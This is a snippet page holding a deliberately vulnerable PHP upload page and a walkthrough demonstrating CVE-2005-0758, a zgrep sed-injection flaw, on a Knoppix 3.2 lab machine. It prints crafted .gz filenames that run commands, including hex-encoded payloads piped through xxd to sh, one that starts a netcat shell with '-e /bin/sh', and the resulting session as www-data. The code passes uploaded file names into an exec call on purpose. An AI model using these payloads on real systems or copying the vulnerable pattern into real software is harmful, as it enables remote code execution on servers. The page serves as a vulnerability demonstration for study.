public
Authored by 
cleemy desu wayo
cleemy desu wayo a sample of CVE-2005-0758 (sed injection)
about sed injection
- CWE-74: https://cwe.mitre.org/data/definitions/74.html
- CWE-77: https://cwe.mitre.org/data/definitions/77.html
- CVE-2022-1509: https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/
try this sample on Knoppix 3.2
Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed from the beginning when booting from Knoppix 3.2 (released at 2003) Live CD.
you can run this sample on Knoppix 3.2 very easily without special settings.
download Knoppix iso
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
<!doctype html>
<html lang="en-US">
<head>
<!--
============================================================
a sample of CVE-2005-0758
written by cleemy desu wayo / licensed under CC0
last update: 2023-08-08
============================================================
* try this sample on Knoppix 3.2:
Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed
from the beginning when booting from Knoppix 3.2 (released
at 2003) Live CD.
you can run this sample on Knoppix 3.2 very easily without
special settings.
* download Knoppix iso:
https://archive.org/details/knoppix-3.2-2003-07-26-en
https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc
* how to run this sample:
1. boot Knoppix Live CD ordinarily
2. put this file (cve-2005-0758.php) on /var/www/ on server.
"server" means Knoppix.
3. change owner and chmod (on server)
$ cd /var/www
$ sudo chown www-data:www-data cve-2005-0758.php
$ sudo chmod 600 cve-2005-0758.php
4. start apache (on server)
$ sudo apachectl start
5. try connect from a client machine to
http://<knoppix>/cve-2005-0758.php
(when Knoppix is running on VirtualBox or some such,
"client machine" means host OS)
-->
<title>a sample of CVE-2005-0758 (sed injection)</title>
<style>
body { margin: 0 0 0 0; font-family: Arial;}
h1, h2, h3, form, div, p { margin: 2.2rem 1.2rem 1.2rem 1.4rem; color: #333; }
h1 { margin: 1rem 1.2rem 0.4rem 1.8rem; font-size: 2.1rem; }
h2 { margin: 2.2rem 1.2rem 1.2rem 1.2rem; font-size: 1.6rem; }
h3 { margin: 1.6rem 1.2rem 0.8rem 1.2rem; font-size: 1.1rem; }
p { margin: 0.8rem 1.2rem 0.8rem 1.8rem; }
form, div.fileinfo, div.description {
margin: 2.2rem 2% 1.2rem 2%;
padding: 0 0 2.2rem 0.6rem;
border: 2px solid #ccc;
border-radius: 8px;
}
ul, ol { margin: 0.8rem 1rem 0.9rem 1.2rem; }
ul li { margin: 0.1rem 0 0.1rem 0; }
ol li { margin: 0.8rem 0 0.9rem 0; }
li a { font-size: 0.85rem; }
span.info {
margin-left: 0.8rem;
color: #6666aa;
font-size: 105%;
}
code {
margin: 0.6rem 0 1.2rem 1.2rem;
padding: 0.6rem 0 0.6rem 0.6rem;
display: block;
background-color: #333;
color: #eee;
max-width: 40rem;
line-height: 110%;
}
a { text-decoration: none; }
a:hover { text-decoration: underline; }
footer {
margin: 3rem 0 0 0;
padding: 1.2rem 1rem 1.2rem 1rem;
background-color: #eee;
}
</style>
</head>
<body>
<h1>a sample of CVE-2005-0758</h1>
<p>written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-08</p>
<div class="fileinfo">
<h2>uploaded file infomartion:</h2>
<?
if(empty($_FILES)) {
print('<p>(no file uploaded)</p>');
} else{
$is_gz_str = 'no';
$original_file_basename = basename($_FILES['file']['name']);
$original_file_pathinfo = pathinfo($original_file_basename);
if($original_file_pathinfo['extension'] === 'gz') {
$is_gz_str = 'yes';
// move to ./gz_stored/
move_uploaded_file($_FILES['file']['tmp_name'], './gz_stored/'. $original_file_basename);
// exec zgrep
exec('zgrep CVE gz_stored/*.gz', $search_results);
// save search results
$fp = fopen('./gz_stat/latest-search-result.txt', 'w');
foreach ($search_results as $line) {
fwrite($fp, $line. "\n");
}
fclose($fp);
}
print('<p>file name: <span class="info">'. htmlspecialchars($_FILES['file']['name']). '</span></p>');
print('<p>tmp file name: <span class="info">'. htmlspecialchars($_FILES['file']['tmp_name']). '</span></p>');
print('<p>stored to gz_stored/ directory: <span class="info">'. htmlspecialchars($is_gz_str). '</span></p>');
}
?>
</div>
<form enctype="multipart/form-data" method="post">
<h2>try upload a file:</h2>
<p><input type="file" name="file"></p>
<p><input type="submit"></p>
</form>
<div class="description">
<h2>about CVE-2005-0758</h2>
<p>this is an ancient vulnerability of zgrep. in case of GNU gzip, zgrep is a wrapper script.</p>
<ul>
<li>NVD: <a href="https://nvd.nist.gov/vuln/detail/CVE-2005-0758">https://nvd.nist.gov/vuln/detail/CVE-2005-0758</a></li>
<li>gentoo bug tracker: <a href="https://bugs.gentoo.org/90626">https://bugs.gentoo.org/90626</a></li>
<li>before fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=2e9a1172e1606983f6383b99eebdc0a0de706fc2</a></li>
<li>after fix:<a href="https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b">https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=a7528501d19c16640044bc0ff86a6eab8d4d637b</a></li>
</ul>
<h2>about sed injection</h2>
<ul>
<li>CWE-74: <a href="https://cwe.mitre.org/data/definitions/74.html">https://cwe.mitre.org/data/definitions/74.html</a></li>
<li>CWE-77: <a href="https://cwe.mitre.org/data/definitions/77.html">https://cwe.mitre.org/data/definitions/77.html</a></li>
<li>CVE-2022-1509: <a href="https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/">https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/</a></li>
</ul>
<h2>try this sample on Knoppix 3.2</h2>
<p>Apache 1.3.27, PHP 4.2.3, and vulnerable zgrep are installed from the beginning when booting from Knoppix 3.2 (released at 2003) Live CD.</p>
<p>you can run this sample on Knoppix 3.2 very easily without special settings.</p>
<h3>download Knoppix iso</h3>
<ul>
<li><a href="https://archive.org/details/knoppix-3.2-2003-07-26-en">https://archive.org/details/knoppix-3.2-2003-07-26-en</a></li>
<li><a href="https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc">https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.2-2003-07-26-EN.iso.md5.asc</a></li>
</ul>
<h3>try RCE</h3>
<ol>
<li>boot Knoppix Live CD ordinarily</li>
<li>put this file (cve-2005-0758.php) on /var/www/ on server. "server" means Knoppix.</li>
<li>change owner and chmod (on server)<code>$ cd /var/www<br>$ sudo chown www-data:www-data cve-2005-0758.php<br>$ sudo chmod 600 cve-2005-0758.php</code></li>
<li>start apache (on server)<code>$ sudo apachectl start</code></li>
<li>try connect from a client machine to http://<knoppix>/cve-2005-0758.php<br>(when Knoppix is running on VirtualBox or some such, "client machine" means host OS)</li>
<li>create some directories in /var/www (on server)<code>$ cd /var/www<br>$ sudo mkdir gz_stat<br>$ sudo mkdir gz_stored</code></li>
<li>change owner and chmod (on server)<code>$ sudo chown www-data:www-data gz_stat gz_stored<br>$ sudo chmod 707 gz_stat gz_stored<br></code></li>
<li>create an ordinary gz file (on client)<code>$ echo CVE-2005-0758 > hoge.txt<br>$ gzip hoge.txt<br>$ wc -c hoge.txt.gz<br>43 hoge.txt.gz</code></li>
<li>access from the client machine to http://<knoppix>/cve-2005-0758.php<br>and upload hoge.txt.gz</li>
<li>check if you have successfully uploaded (on server)<pre><code>$ cd /var/www/gz_stored<br>$ sudo wc -c hoge.txt.gz<br> 43 hoge.txt.gz<br>$ cat ../gz_stat/latest-search-result.txt<br>CVE-2005-0758</code></pre></li>
<li>create a new gz file with a crafted filename (on client)<code>$ cp hoge.txt.gz '|;edate;#.gz'</code></li>
<li>access to http://<knoppix>/cve-2005-0758.php again and upload a new file</li>
<li>check if date command was executed and the search results are weird (on server)<code>$ cd /var/www/gz_stat<br>$ cat latest-search-result.txt<br>gz_stored/hoge.txt.gz:CVE-2005-0758<br>Tue Aug 8 14:54:20 CEST 2023<br>gz_stored/CVE-2005-0758</code></li>
<li>delete a file with a crafted filename (on server)<br>(not necessary to do, but may be confusing if there are multiple files with crafted filenames on server)<br>and do NOT delete hoge.txt.gz<code>$ cd /var/www/gz_stored<br>$ sudo rm -rf *'#.gz'</code></li>
</ol>
<h2>crafted filenames examples</h2>
<h3>several commands</h3>
<ul>
<li>you can exec several commands (this only taints the search results):<code>|;edate;whoami;id;#.gz</code></li>
</ul>
<h3>exec xgalaga on server-side</h3>
<ul>
<li>this may not work:<code>|;exgalaga;#.gz</code></li>
<li>this works fine (exec /usr/games/xgalaga):<code>|;eecho 2f7573722f67616d65732f7867616c6167610a|xxd -r -p|sh;#.gz</code></li>
</ul>
<h3>get a reverse shell</h3>
<ul>
<li>exec 'nc -lnvp 4444 -e /bin/sh':<code>|;eecho 6e63202d6c6e76702034343434202d65202f62696e2f73680a|xxd -r -p|sh;#.gz</code></li>
<li>try connect to a reverse shell with netcat (from a client machine)<code>$ nc 192.168.1.3 4444<br>uname -a<br>Linux Knoppix 2.4.21-xfs #1 SMP Fre Jul 25 00:06:47 CEST 2003 i686 GNU/Linux<br>pwd<br>/var/www<br>whoami<br>www-data</code></li>
</ul>
</div>
<footer>
<p>written by cleemy desu wayo (
<a href="https://github.com/cleemy-desu-wayo">GitHub</a> -
<a href="https://gitlab.com/cleemy-desu-wayo">GitLab</a> -
<a href="https://huntr.dev/users/cleemy-desu-wayo/">huntr.dev</a> -
<a href="https://note.com/cleemy/">note.com</a>)
</p>
<p>license: CC0</p>
<p>initial release: 2023-08-08</p>
<p>last update: 2023-08-08</p>
</footer>
</body>
</html>
Please register or sign in to comment